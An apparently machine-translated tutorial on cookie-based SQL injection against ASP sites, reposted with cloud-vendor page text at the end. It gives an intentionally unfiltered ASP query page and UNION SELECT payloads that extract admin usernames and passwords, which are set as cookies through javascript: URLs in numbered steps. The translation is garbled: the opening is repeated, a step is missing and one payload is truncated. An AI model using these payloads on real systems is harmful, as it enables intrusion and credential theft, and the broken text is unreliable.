I will not write down the specific principles and analysis process. I will write a large piece of data, and I will talk about the details of the operation process. In the Privacy Report, all cookies must be accepted to reduce the security.
I will not write down the specific principles and analysis process. I will write a large piece of data, and I will talk about the details of the operation process. In the Privacy Report, all cookies must be accepted to reduce the security.
The cookie value is saved to the local machine after being connected, that is, after IE is disabled.
Prerequisites: 1. The website does not filter cookies for injection.
2. You need to know the name of the database administrator table and calculate the number of columns in the database for the injection file database query statement.
Open the database and find the table name "Product". The number of calculated fields is 21. The Administrator table name is admin user and password field name is username and password. If no file is injected, we can construct a test for your convenience.
Construct the following simple injection ASP, of course, I did not strictly filter, that is, accept any method of submission ..
<! -- # Include file = "Inc/conn. asp" --> // call the database connection file
<%
Dim ID, SQL, rs // define function
ID = trim (request ("ID") // accept any form of submission to empty
If Id = "" then // jump where id is null
Response. Redirect ("Product. asp ")
End if
SQL = "select * from Product where ID =" & ID & "// record set query statement
Set rs = Server. CreateObject ("ADODB. Recordset") // call the query statement to jump to the pointer of the record Set id
Rs. open SQL, conn, 1, 3 // added record expression method 1, 3 read/write, Optimistic Locking
If rs. bof and rs. eof then // The system prompts BOF or EOF. The program determines if an error occurs.
Response. Write ("<p> This product cannot be found </p> ")
Else
%>
<P> <% = rs ("Title") %> </p> // reverse pointer content. The selected field must be of the same type as the administrator's user password.
<P> <% = rs ("product_id") %> </p>
<P> <% = rs ("Price") %> </p>
<%
End if
Rs. close // clear
Set rs = nothing
Call CloseConn
%>
Find ID = 55 in the previous figure
Construct a joint query statement
And 1 = 2 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21 from Admin replace 6, 2 with username and password respectively
To try cookie injection. Find a target. The injection point structure is similar to the previous one and will not be analyzed again. Only post and get injection are filtered.
Step 1: re-open IE, First connect to the website http: // 127.0.0.1/nf to be injected, that is, remove the previous link value. Note: Do not operate directly at the link shown in the preceding figure. It may fail.
Step 2: Clear the IE address and add the following to the address again:
Javascript: alert (document. cookie = "id =" + escape ("56 and 1 = 2 union select 1,
, From Admin "))
Clear IE again and enter http: // 127.0.0.1/nf/ProductShow. asp
Step 4: Repeat Step 1. Note that this step is required. Many failures are here.
Step 5: Clear IE at the address and add the following code to the address again:
Javascript: alert (document. cookie = "id =" + escape ("56 and 1 = 2 union select 1,
Username, 3, 4, 5, 6, password, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21 from Admin "))
Step 6. Clear IE at the address again. Http: // 127.0.0.1/nf/ProductShow. asp
The full text is complete. Share as many articles as possible
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
